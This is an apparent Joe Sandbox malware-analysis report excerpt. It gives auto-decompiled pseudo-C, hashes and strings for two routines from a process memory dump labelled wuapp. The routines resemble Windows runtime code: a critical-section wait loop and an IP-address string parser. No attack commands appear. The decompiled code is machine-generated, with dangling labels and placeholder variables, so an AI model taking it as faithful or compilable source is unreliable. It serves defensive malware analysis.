                                                        0x00000000
                                                        0x01f022ab
                                                        0x01f022ad
                                                        0x01f022af
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01f022af
                                                        0x01f022b1
                                                        0x01f022b4
                                                        0x01f022b4
                                                        0x01f022b6
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01f022b6
                                                        0x01f0228f
                                                        0x00000000
                                                        0x01f0226d
                                                        0x01ec53cb
                                                        0x01ec53ce
                                                        0x01ec53d0
                                                        0x01ec53d4
                                                        0x01ec53d6
                                                        0x00000000
                                                        0x01ec53d8
                                                        0x01ec53e3
                                                        0x01ec53ea
                                                        0x01ec53ea
                                                        0x01ec53d6
                                                        0x00000000

                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01F022F4
                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 01F02328
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01F022FC
                                                        • RTL: Resource at %p, xrefs: 01F0230B
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-871070163
                                                        • Opcode ID: 3e840c40ed192bce61b250a9b22b62365ef72b4d7e550880904cf540b006f874
                                                        • Instruction ID: 1f4f7147f9b66352e6f7794a44b6c7a8882a2edd15ec96f0f0b5fa9852e68c05
                                                        • Opcode Fuzzy Hash: 3e840c40ed192bce61b250a9b22b62365ef72b4d7e550880904cf540b006f874
                                                        • Instruction Fuzzy Hash: A8510971700742ABEF129B6CCC84FAE77E9AF54724F11521DFD48DB285EB61E84287A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01ECEC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 51%
                                                        			E01ECEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E01EBDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x1f8793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E01EA16C0(_t39);
				} else {
					_t40 = E01E9F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E01EE3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E01EA01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x1f8793c; // 0x0
								_push(_t85);
								_t44 = E01EA1F28(_t71);
							} else {
								_t44 = E01E9F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E01EE3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E01F22306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E01ECEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E01EE4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E01EF3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E01EF3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x1f820c0;
								if(_t85 != 0x1f820c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E01F2217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E01EF3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                        0x01ecec56
                                                        0x01ecec56
                                                        0x01ecec56
                                                        0x01ecec5c
                                                        0x01ecec64
                                                        0x01f023e6
                                                        0x01f023eb
                                                        0x01f023eb
                                                        0x01ecec6a
                                                        0x01ecec6c
                                                        0x01ecec6f
                                                        0x01f023f3
                                                        0x01f023f8
                                                        0x01f023fa
                                                        0x01f023fc
                                                        0x01ecec75
                                                        0x01ecec76
                                                        0x01ecec76
                                                        0x01ecec7b
                                                        0x01ecec7c
                                                        0x01ecec7e
                                                        0x01f02406
                                                        0x01f02407
                                                        0x01f0240c
                                                        0x01f0240d
                                                        0x01f0240d
                                                        0x01f0240d
                                                        0x01f02414
                                                        0x01f02417
                                                        0x01f0241e
                                                        0x01f02435
                                                        0x01f02438
                                                        0x01f0243c
                                                        0x01f0243f
                                                        0x01f02442
                                                        0x01f02443
                                                        0x01f02446
                                                        0x01f02449
                                                        0x01f02453
                                                        0x01f02455
                                                        0x01f0245b
                                                        0x01f0245b
                                                        0x01eceb99
                                                        0x01eceb99
                                                        0x01eceb9c
                                                        0x01eceb9d
                                                        0x01eceb9f
                                                        0x01eceba2
                                                        0x01f02465
                                                        0x01f0246b
                                                        0x01f0246d
                                                        0x01eceba8
                                                        0x01eceba9
                                                        0x01eceba9
                                                        0x01ecebae
                                                        0x01ecebb3
                                                        0x01ecebb9
                                                        0x01ecebbb
                                                        0x01f02513
                                                        0x01f02514
                                                        0x01f02519
                                                        0x01f0251b
                                                        0x01ecec2a
                                                        0x01ecec2d
                                                        0x01ecec33
                                                        0x01ecec36
                                                        0x01ecec3a
                                                        0x01ecec3e
                                                        0x01ecec40
                                                        0x01ecec47
                                                        0x01ecec47
                                                        0x01ecec40
                                                        0x01ea22c6
                                                        0x01ecebc1
                                                        0x01ecebc1
                                                        0x01ecebc5
                                                        0x01ecec9a
                                                        0x01ecec9a
                                                        0x01ecebd6
                                                        0x01ecebd6
                                                        0x00000000
                                                        0x01ecebbb
                                                        0x01f02477
                                                        0x01f0247c
                                                        0x01f02486
                                                        0x01f0248b
                                                        0x01f02496
                                                        0x01f0249b
                                                        0x01f0249d
                                                        0x01f024a0
                                                        0x01f024a3
                                                        0x01f024aa
                                                        0x01f024aa
                                                        0x01f024a5
                                                        0x01f024a5
                                                        0x01f024a5
                                                        0x01f024ac
                                                        0x01f024af
                                                        0x01f024b0
                                                        0x01f024b3
                                                        0x01f024b9
                                                        0x01f024ba
                                                        0x01f024bb
                                                        0x01f024c6
                                                        0x01f024cb
                                                        0x01f024cd
                                                        0x01f024d0
                                                        0x01f024d1
                                                        0x01f024d4
                                                        0x01f024d6
                                                        0x01f024d9
                                                        0x01f024d9
                                                        0x01f024dc
                                                        0x01f024df
                                                        0x01f024e1
                                                        0x01f024e7
                                                        0x01f024e9
                                                        0x01f024ec
                                                        0x01f024ef
                                                        0x01f024f2
                                                        0x01f024f2
                                                        0x01f024ef
                                                        0x01f024e7
                                                        0x01f024fa
                                                        0x01f024ff
                                                        0x01f02501
                                                        0x01f02503
                                                        0x01f02506
                                                        0x01f0250b
                                                        0x01eceb8c
                                                        0x01eceb93
                                                        0x00000000
                                                        0x00000000
                                                        0x01eceb93
                                                        0x00000000
                                                        0x01eceb99
                                                        0x01ecec85
                                                        0x01ecec85
                                                        0x01ecec85
                                                        0x00000000

                                                        Strings
                                                        • RTL: Re-Waiting, xrefs: 01F024FA
                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01F0248D
                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01F024BD
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                        • API String ID: 0-3177188983
                                                        • Opcode ID: fd1fbb1415be2d239dcef93396bc0fbce553f5d05d3feac906f93d3f09a9d383
                                                        • Instruction ID: 91451f57e35ed3a610530484d860a102d3709270eb174a951a9e231eb151c844
                                                        • Opcode Fuzzy Hash: fd1fbb1415be2d239dcef93396bc0fbce553f5d05d3feac906f93d3f09a9d383
                                                        • Instruction Fuzzy Hash: AA41F570A00245ABDB20DB68CD88FAE7BB9EF48720F209609F655DB2C1D735E941C7B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01EDFCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E01EDFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E01EDEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E01EDEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E01ED685D(_t167, 4) == 0) {
								if(E01ED685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E01ED685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E01ED685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E01EB8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E01EADFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E01EDEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E01EDEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                        0x01edfcd1
                                                        0x01edfcd6
                                                        0x01edfcd9
                                                        0x01edfcdc
                                                        0x01edfcdf
                                                        0x01edfce2
                                                        0x01edfce5
                                                        0x01edfce8
                                                        0x01edfceb
                                                        0x01edfced
                                                        0x01edfced
                                                        0x01edfcf3
                                                        0x00000000
                                                        0x00000000
                                                        0x01edfcfc
                                                        0x01edfcfe
                                                        0x01edfdc1
                                                        0x01f0ecbd
                                                        0x00000000
                                                        0x01f0eccc
                                                        0x01f0eccc
                                                        0x01f0ecd2
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0ecdf
                                                        0x01f0ece0
                                                        0x01f0ece4
                                                        0x01f0eceb
                                                        0x01f0ecee
                                                        0x01f0eca8
                                                        0x01f0eca8
                                                        0x01f0ecaa
                                                        0x01edfd76
                                                        0x01edfd79
                                                        0x01edfdb4
                                                        0x01edfdb5
                                                        0x01edfdb6
                                                        0x00000000
                                                        0x01edfdb6
                                                        0x01edfd7e
                                                        0x01f0ecfc
                                                        0x01edfe2f
                                                        0x00000000
                                                        0x01edfe2f
                                                        0x01f0ed08
                                                        0x01f0ed0f
                                                        0x01f0ed17
                                                        0x01f0ed1b
                                                        0x00000000
                                                        0x01f0ed1b
                                                        0x01edfd88
                                                        0x00000000
                                                        0x00000000
                                                        0x01edfd94
                                                        0x01edfd99
                                                        0x01edfda1
                                                        0x00000000
                                                        0x00000000
                                                        0x01edfdb0
                                                        0x00000000
                                                        0x01edfdb0
                                                        0x01f0ecbd
                                                        0x01edfdc7
                                                        0x01edfdcb
                                                        0x00000000
                                                        0x01edfdd7
                                                        0x01edfde3
                                                        0x01edfe06
                                                        0x01ef1fe7
                                                        0x00000000
                                                        0x00000000
                                                        0x01ef1fef
                                                        0x01ef1ff0
                                                        0x01ef1ff4
                                                        0x01ef1ff7
                                                        0x01ef1ffa
                                                        0x01ef1ffd
                                                        0x01ef2000
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0ecf1
                                                        0x00000000
                                                        0x01f0ecf1
                                                        0x00000000
                                                        0x01edfe06
                                                        0x01edfde8
                                                        0x01edfdec
                                                        0x01edfdef
                                                        0x01edfdf2
                                                        0x00000000
                                                        0x01edfdf2
                                                        0x01edfdcb
                                                        0x01edfd04
                                                        0x01edfd05
                                                        0x01f0ec67
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0ec6f
                                                        0x00000000
                                                        0x01f0ec6f
                                                        0x01edfd13
                                                        0x01edfd3c
                                                        0x01edfd40
                                                        0x01f0ec75
                                                        0x01f0ec7a
                                                        0x00000000
                                                        0x01f0ec8a
                                                        0x01f0ec8a
                                                        0x01f0ec90
                                                        0x01f0ecb2
                                                        0x01edfd73
                                                        0x01edfd73
                                                        0x00000000
                                                        0x01edfd73
                                                        0x01f0ec95
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0eca1
                                                        0x01f0eca4
                                                        0x01f0eca5
                                                        0x00000000
                                                        0x01f0eca5
                                                        0x01f0ec7a
                                                        0x01edfd4a
                                                        0x00000000
                                                        0x01edfd6e
                                                        0x01edfd6e
                                                        0x01edfd71
                                                        0x00000000
                                                        0x01edfd71
                                                        0x01edfd4a
                                                        0x01edfd21
                                                        0x01eea3a1
                                                        0x00000000
                                                        0x01eea3a1
                                                        0x01edfd36
                                                        0x01ef200b
                                                        0x01ef2012
                                                        0x00000000
                                                        0x00000000
                                                        0x01ef2018
                                                        0x00000000
                                                        0x01ef2018
                                                        0x00000000
                                                        0x01edfd36
                                                        0x01edfe0f
                                                        0x01edfe16
                                                        0x01eea3ad
                                                        0x00000000
                                                        0x00000000
                                                        0x01eea3b3
                                                        0x01eea3b3
                                                        0x01edfe1f
                                                        0x01f0ed25
                                                        0x01f0ed86
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0ed91
                                                        0x01f0ed95
                                                        0x01f0ed95
                                                        0x01f0ed9a
                                                        0x01f0edad
                                                        0x01f0edb3
                                                        0x01f0edba
                                                        0x01f0edc4
                                                        0x01f0edc9
                                                        0x00000000
                                                        0x01f0edcc
                                                        0x01f0ed2a
                                                        0x01f0ed55
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0ed61
                                                        0x01f0ed66
                                                        0x01f0ed6e
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0ed7d
                                                        0x00000000
                                                        0x01f0ed7d
                                                        0x01f0ed30
                                                        0x00000000
                                                        0x00000000
                                                        0x01f0ed3c
                                                        0x01f0ed43
                                                        0x01f0ed4b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: true
                                                        • Associated: 00000008.00000002.1175733690.0000000001E80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175833577.0000000001F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175842743.0000000001F80000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175852009.0000000001F84000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175859915.0000000001F87000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175866735.0000000001F90000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000008.00000002.1175904281.0000000001FF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_1e80000_wuapp.jbxd
                                                        Similarity
                                                        • API ID: __fassign
                                                        • String ID:
                                                        • API String ID: 3965848254-0
                                                        • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                        • Instruction ID: c294a4bacacf51e8591c572116c02507e814fb6c1269c138f84eac22a5cabaf9
                                                        • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                        • Instruction Fuzzy Hash: E091B231D0024AEEDF25CF58C8457EEBBB4FF45318F24946AE912A7292E7314A43DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%